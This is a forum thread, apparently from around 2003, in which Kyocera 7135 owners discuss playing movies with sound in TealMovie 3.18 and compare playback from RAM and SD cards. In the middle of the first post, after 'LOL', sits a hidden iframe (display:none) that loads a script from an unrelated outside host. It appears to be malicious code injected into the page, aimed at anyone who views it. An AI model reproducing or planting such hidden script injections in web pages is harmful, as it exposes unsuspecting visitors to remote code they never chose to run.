+ Reply to Thread
Page 1 of 11 1 2 3 4 5 ... LastLast

Video of 7135 Playing Movie with Sound!

Although the sound isn't "related" to the video, here is a movie of Apollo astronauts on the moon with music in the background. This is being done by TealMovie version 3.18 Notice the release notes for version 3.18:
    Version 3.18 - January 21, 2003
    Added sound support for Kyocera Smartphone :coolquick :clap
    Fixed unscaled video playback on HandEra
    Fixed sound popping on HandEra
    Fixed looping for movies with looping option set
    If you want to try it out on your own 7135, pull down TealMovie from the above site (or below, I'll attach it) and I'll also attach the Astronaut video.

And for all of you that don't have a 7135 yet, here is a movie for you to salivate over

Video of 7135 Playing Movie w/Sound
    TealMovie Program ver 3.18
    Astronaut Movie with Sound

Now don't ask me HOW to make the movie :dunno:dunno I didn't make it, I just played it, LOL<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    --Jazz--

Oh my gosh! Thank you so much jazz!
    It is short and sweet, but a wonderful example of video AND audio working beautifully together on our beloved 7135!

Though I think the tune from 2001 Space Odysey would have been a better soundtrack for it rather than ragtime.

Do you have more clips or a site that we can download them from?

I now have a great way to show off my brand new phone!

jazz, u da best
    ~'kito
    pdaPhoneHome Moderator

I like the part at TealMovie's site where it says...

"Version 3.18 - January 21, 2003
    Added sound support for Kyocera Smartphone"

and

"Added support for Kyocera "select" button"

Now we are getting some respect!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Do you have more clips or a site that we can download them from?
    I'll answer my own question...

http://www.tealpoint.com/movies.htm
    ~'kito
    pdaPhoneHome Moderator

Thanks Jazz! I loaded this program and the astronaut movie. It works great when the movie is in RAM. When I move the movie to my SD card, it plays for about 2 secs, then the sound cuts out for a second. When the sound comes back, it gradually slows down and sounds like a 78 rpm record on 33 1/3. Did you have this problem?

Good news/ Bad news...

Good news. This seems to work perfectly if the movie is in RAM.

With the movie on my SD card, I got sound skipping, and then started to slow down (although it did stay in synch. A menu item in the software allows you to select whether or not it should slow down to stay in synch or not). The third time I watched the movie, my 7135 locked up at the end of the movie requiring a soft reset.

Are some brands of SD cards fasdter then others? I have a Sandisk that came with my cruzer, but if there is a faster card available, that may resolve this only apparent problem....

Alan

I am using a 256 MB Sandisk as well.

From the Common Questions section of the manual:

"The PalmOS VFS system also seems to have a problem sustaining data rates as code
    progresses further from the beginning of the file, which can slow down playback for large video
    files when played from an external storage card."

Our dream of watching recorded television episodes on our 7135's may not be possible.....

Alan

One more little glitch to be aware of.... Unlike the MP3 player, if you receive a call while a movie is playing, your phone will give no indication until the clip ends.....

Alan

I don't care about watching TV on my 7135, I just want to be able to watch 1-2MB movies of my kids. Doesn't look like that is possible unless I hog up the memory in RAM.

Originally posted by davemayo
    I don't care about watching TV on my 7135, I just want to be able to watch 1-2MB movies of my kids. Doesn't look like that is possible unless I hog up the memory in RAM.
    For that, though, you could store multiple movies on the card, and move them to Ram when you want to watch them, so you only need to leave a couple of Meg free.

Alan

You're right, and that is the way I'll do it. I was just venting b/c I was excited about running them right off the card. Oh well, at least we now have in sync sound.

I have downloaded 5 videos and they all worked perfectly. Of course they were on the RAM.

Sad news about the SD card. I was about to play them off of there. But despite that, I love your idea about just moving them over to RAM before playing, Alan. Great tip.

I really do want to watch sitcoms on this thing, so I will keep trying.

Isn't it great to have sound working without any flip open, then flip closed kind of work around!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I have downloaded 5 videos and they all worked perfectly. Of course they were on the RAM.

Sad news about the SD card. I was about to play them off of there. But despite that, I love your idea about just moving them over to RAM before playing, Alan. Great tip.

I really do want to watch sitcoms on this thing, so I will keep trying.

Isn't it great to have sound working without any flip open, then flip closed kind of work around!
    Are any of your SD cards from vendors other then Sandisk? Maybe you could try with one of those. I read a rumour somewhere (can't recall if it was here or on Usenet) that the Sandisk cards are actually slower then other brands. Not sure whether I believe it or not, or if it would make a difference.

Alan

Nope, all of mine are Sandisk. If it's true, I would have liked to have known that before I bought several Sandisk.
    ~'kito
    pdaPhoneHome Moderator

I'm not sure about SanDisk, but I read this bit a couple of weeks ago.

SimpleTech is coming out with some faster SD cards.

http://www.dpreview.com/news/0301/03...etech512sd.asp

Today SimpleTech introduced a 512 MB SD Memory card, featuring up to 10MB/s write speeds, this complements their original line up of SD cards in 32MB, 64MB, 128MB and 256MB capacities. It is available immediately for $400
    Maybe that card will be better...

I think the larger the capacity, the faster the sd card.....

www.sdtrend.com

Maybe the 1GB cards will be fast enough (and large enough too)
    iPhone therefore iAm.

Well, the only good thing is that if you have a clip that doesn't have sound (i.e. "Whitewater Kayaking" from the Sports & Entertainment category at http://www.tealpoint.com/movies.htm
    ), you can play it flawlessly from your card.

I did and it had no speed problems. Of course, who wants to watch silent movies? But an interesting observation to through into the discussion.
    ~'kito
    pdaPhoneHome Moderator

Can you play an mp3 of ragtime in the backgroud while you are watching the Kayaking? lol
    iPhone therefore iAm.

If anybody's curious, this works fine on the I300 too. I also have a really neat BMW Z3 video.

DLD

+ Reply to Thread
Page 1 of 11 1 2 3 4 5 ... LastLast